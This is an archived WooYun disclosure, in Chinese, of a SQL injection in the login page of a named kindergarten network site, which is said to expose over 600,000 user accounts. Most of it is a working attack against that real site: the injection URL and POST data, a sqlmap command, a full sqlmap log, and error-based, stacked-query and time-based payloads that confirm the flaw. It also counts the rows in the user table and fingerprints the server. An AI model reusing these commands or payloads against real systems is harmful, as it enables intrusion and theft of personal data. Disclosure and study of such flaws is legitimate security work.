乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-19: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-03: 厂商已经主动忽略漏洞,细节向公众公开
凯尔幼教联盟网POST SQL注入漏洞(涉及60W+用户信息)
注入点:http://www.krbb.cn/login/chklogin.asp POST数据:uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634sqlmap语句:python sqlmap.py -u "http://www.krbb.cn/login/chklogin.asp" --data "uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1&mm=88952634" sqlmap截图:
USER表太多了 检测了一个Database: www_krbb_cn+-------------+---------+| Table | Entries |+-------------+---------+| dbo.Dv_User | 612629 |所有用户的话 肯定进百万了
sqlmap全过程
[11:21:38] [INFO] testing connection to the target URL[11:21:38] [INFO] heuristics detected web page charset 'GB2312'[11:21:39] [INFO] testing if the target URL is stable. This can take a couple of seconds[11:21:40] [INFO] target URL is stable[11:21:40] [INFO] testing if POST parameter 'uid' is dynamic[11:21:41] [WARNING] POST parameter 'uid' does not appear dynamic[11:21:41] [WARNING] heuristic (basic) test shows that POST parameter 'uid' might not be injectable[11:21:41] [INFO] testing for SQL injection on POST parameter 'uid'[11:21:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[11:21:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[11:21:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[11:21:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[11:21:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[11:21:49] [INFO] testing 'MySQL inline queries'[11:21:49] [INFO] testing 'PostgreSQL inline queries'[11:21:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[11:21:49] [INFO] testing 'Oracle inline queries'[11:21:50] [INFO] testing 'SQLite inline queries'[11:21:50] [INFO] testing 'MySQL > 5.0.11 stacked queries'[11:21:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[11:21:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[11:21:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[11:21:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'[11:21:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[11:22:00] [INFO] testing 'Oracle AND time-based blind'[11:22:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'[11:22:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[11:22:23] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'[11:22:40] [WARNING] POST parameter 'uid' is not injectable[11:22:40] [INFO] testing if POST parameter 'pwd' is dynamic[11:22:40] [WARNING] POST parameter 'pwd' does not appear dynamic[11:22:40] [WARNING] heuristic (basic) test shows that POST parameter 'pwd' might not be injectable[11:22:40] [INFO] testing for SQL injection on POST parameter 'pwd'[11:22:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[11:22:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[11:22:47] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[11:22:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[11:22:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[11:22:54] [INFO] testing 'MySQL inline queries'[11:22:54] [INFO] testing 'PostgreSQL inline queries'[11:22:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[11:22:55] [INFO] testing 'Oracle inline queries'[11:22:55] [INFO] testing 'SQLite inline queries'[11:22:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'[11:22:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[11:22:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[11:23:01] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[11:23:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'[11:23:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[11:23:04] [INFO] testing 'Oracle AND time-based blind'[11:23:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'[11:23:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[11:23:42] [WARNING] POST parameter 'pwd' is not injectable[11:23:42] [INFO] testing if POST parameter 'cookieexists' is dynamic[11:23:43] [WARNING] POST parameter 'cookieexists' does not appear dynamic[11:23:43] [WARNING] heuristic (basic) test shows that POST parameter 'cookieexists' might not be injectable[11:23:43] [INFO] testing for SQL injection on POST parameter 'cookieexists'[11:23:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[11:23:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[11:23:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[11:23:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[11:23:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[11:23:55] [INFO] testing 'MySQL inline queries'[11:23:55] [INFO] testing 'PostgreSQL inline queries'[11:23:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[11:23:56] [INFO] testing 'Oracle inline queries'[11:23:56] [INFO] testing 'SQLite inline queries'[11:23:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'[11:23:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[11:24:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[11:24:03] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[11:24:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'[11:24:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[11:24:09] [INFO] testing 'Oracle AND time-based blind'[11:24:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'[11:24:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[11:24:48] [WARNING] POST parameter 'cookieexists' is not injectable[11:24:48] [INFO] testing if POST parameter 'yhm' is dynamic[11:24:48] [WARNING] POST parameter 'yhm' does not appear dynamic[11:24:48] [WARNING] heuristic (basic) test shows that POST parameter 'yhm' might not be injectable[11:24:48] [INFO] testing for SQL injection on POST parameter 'yhm'[11:24:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[11:24:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[11:24:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[11:24:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[11:24:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[11:24:59] [INFO] testing 'MySQL inline queries'[11:24:59] [INFO] testing 'PostgreSQL inline queries'[11:24:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[11:24:59] [INFO] testing 'Oracle inline queries'[11:24:59] [INFO] testing 'SQLite inline queries'[11:24:59] [INFO] testing 'MySQL > 5.0.11 stacked queries'[11:25:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[11:25:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[11:25:02] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[11:25:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'[11:25:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[11:25:08] [INFO] testing 'Oracle AND time-based blind'[11:25:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'[11:25:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[11:25:50] [WARNING] POST parameter 'yhm' is not injectable[11:25:50] [INFO] testing if POST parameter 'leixing' is dynamic[11:25:50] [WARNING] POST parameter 'leixing' does not appear dynamic[11:25:50] [WARNING] heuristic (basic) test shows that POST parameter 'leixing'might not be injectable[11:25:51] [INFO] testing for SQL injection on POST parameter 'leixing'[11:25:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[11:25:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[11:25:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[11:26:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[11:26:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[11:26:04] [INFO] testing 'MySQL inline queries'[11:26:05] [INFO] testing 'PostgreSQL inline queries'[11:26:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[11:26:05] [INFO] testing 'Oracle inline queries'[11:26:06] [INFO] testing 'SQLite inline queries'[11:26:06] [INFO] testing 'MySQL > 5.0.11 stacked queries'[11:26:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[11:26:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[11:26:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[11:26:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'[11:26:13] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[11:26:14] [INFO] testing 'Oracle AND time-based blind'[11:26:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'[11:26:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[11:26:51] [WARNING] POST parameter 'leixing' is not injectable[11:26:51] [INFO] testing if POST parameter 'mm' is dynamic[11:26:51] [WARNING] POST parameter 'mm' does not appear dynamic[11:26:51] [INFO] heuristic (basic) test shows that POST parameter 'mm' might be injectable (possible DBMS: 'Microsoft SQL Server')[11:26:51] [INFO] testing for SQL injection on POST parameter 'mm'heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n]do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n][11:27:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[11:27:29] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'[11:27:29] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'[11:27:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'[11:27:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[11:27:34] [INFO] POST parameter 'mm' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable[11:27:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[11:27:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[11:28:15] [INFO] POST parameter 'mm' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable[11:28:15] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[11:28:15] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'[11:29:09] [INFO] POST parameter 'mm' seems to be 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' injectable[11:29:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[11:29:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[11:29:10] [WARNING] reflective value(s) found and filtering out[11:29:10] [INFO] ORDER BY technique seems to be usable. This should reduce thetime needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[11:29:11] [INFO] target URL appears to have 12 columns in queryinjection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n][11:29:31] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')POST parameter 'mm' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 1285 HTTP(s) requests:---Parameter: mm (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1&mm=88952634' AND 3331=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3331=3331) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(98)+CHAR(113))) AND 'NukJ'='NukJ Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1&mm=88952634'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1&mm=88952634' AND 5957=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'RLxS'='RLxS---[11:29:33] [INFO] testing Microsoft SQL Server[11:29:33] [INFO] confirming Microsoft SQL Server[11:29:34] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)